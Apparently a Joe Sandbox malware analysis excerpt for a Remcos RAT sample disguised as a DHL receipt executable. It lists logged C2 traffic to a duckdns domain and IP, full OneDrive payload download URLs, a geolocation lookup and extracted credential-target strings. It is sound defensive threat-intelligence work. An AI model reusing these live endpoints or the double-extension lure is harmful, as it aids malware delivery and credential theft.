Source: unknown DNS query: name: jantasagasa.duckdns.org
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD028 InternetCheckConnectionA, 0_2_028BD028
Source: global traffic TCP traffic: 192.168.2.4:49736 -> 23.227.203.18:44577
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 13.107.43.12
Source: Joe Sandbox View IP Address: 13.107.137.11
Source: Joe Sandbox View IP Address: 178.237.33.50
Source: Joe Sandbox View ASN Name: HVC-ASUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sxjVaZT4pY1q2eD0v-X1wiwRbDuGgZo1tPSkJQs1YlyPwcUOiphPP1CFv5fso0icEDo7UAOw11RMGNT3gKAlqFYfTYnpmUh-zszDDp01M-O6V1fxPW_BQeV--ErDLGsxS3W7ik99EAoJzOkWYmsVxFxg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
Source: global traffic HTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtduMf3h_au6JknD7UX3Nl_MoVpKgD52R4PqoJUKWWdS4uSG73hTWQdvja7P44RRgZEYiLLcwYHjthc2obdA6bfKdGY5u4FdO7DnLs4oCuESa0XFsNGj4J9xIGakwI-vvnf8T5wmslL_zbb61Cor0vi4A/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
Source: global traffic HTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4lwBmhbII6IBdf0o3fxZK7yXuPn1LU5GNfJiPoJA9A_3sVCDQ9m4bgvnVzMP5THmKtOGhfXkUIlvBLYfdv66aM2t5dQKJV9HM_tE2EpVyspDfMklEPIq63I71zYBRHlyxU6NlRs6xSUBmbwPAYp6Jhg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
Source: global traffic HTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4SuVfoR9x-Iomuy2BGk4fUfgK1MMU5lLacLNp-_qwXhodYEIY-kbbcZJlxV0oGHQD1Ct2YWj0uKczDCYctblhO9FSOouYIL0JztXtWXSZy4aW13cnRilCw1aQM1FfakIYbRqJw9b266qfDhk_4fORrQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
Source: global traffic HTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /y4mwqLrk7RkQprlQVguzd88u3aa6lBoHekLBbEwen4SV_s0bZDyk4W2wHSklQ9o0cCCMUNAFWFXBJMd5EVMwo_6Fwd9E2VHHxYJdf6JUZ-XNUvMWe3LcrUXywANQk_fQBIHV4OAxI-dyvQC_XAAoGU5rhOshlVK_uuOzHfxjtkmujdvM7GtN2qEEWRWumZ9nPPxMahWmeQsnUX_PjspIY14YQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA66CB1 recv, 0_2_2DA66CB1
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: remcos.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvC179.tmp.20.dr String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvC179.tmp.20.dr String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic DNS traffic detected: DNS query: ppeppa.db.files.1drv.com
Source: global traffic DNS traffic detected: DNS query: jantasagasa.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: bhvC179.tmp.20.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhvC179.tmp.20.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: DHL119040 receipt document,pdf.exe, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000068F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp:R
Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpv
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhvC179.tmp.20.dr String found in binary or memory: http://ocspx.digicert.com0E
Source: xkn.exe, 00000010.00000002.1804930904.00000151BD55B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhvC179.tmp.20.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvC179.tmp.20.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhvC179.tmp.20.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: remcos.exe, 00000014.00000002.1856718053.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: DHL119040 receipt document,pdf.exe, DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp, yfkwifxL.pif, yfkwifxL.pif, 00000001.00000001.1712591373.0000000000418000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000000.1711928775.0000000000416000.00000002.00000001.01000000.00000005.sdmp, yfkwifxL.pif, 00000001.00000001.1712591373.000000000044B000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000002.1876666457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yfkwifxL.pif.0.dr String found in binary or memory: http://www.pmail.com
Source: bhvC179.tmp.20.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhvC179.tmp.20.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhvC179.tmp.20.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhvC179.tmp.20.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhvC179.tmp.20.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhvC179.tmp.20.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhvC179.tmp.20.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhvC179.tmp.20.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhvC179.tmp.20.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: xkn.exe, 00000010.00000002.1804930904.00000151BD507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: xkn.exe, 00000010.00000002.1804930904.00000151BD529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: bhvC179.tmp.20.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvC179.tmp.20.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhvC179.tmp.20.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhvC179.tmp.20.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhvC179.tmp.20.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvC179.tmp.20.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
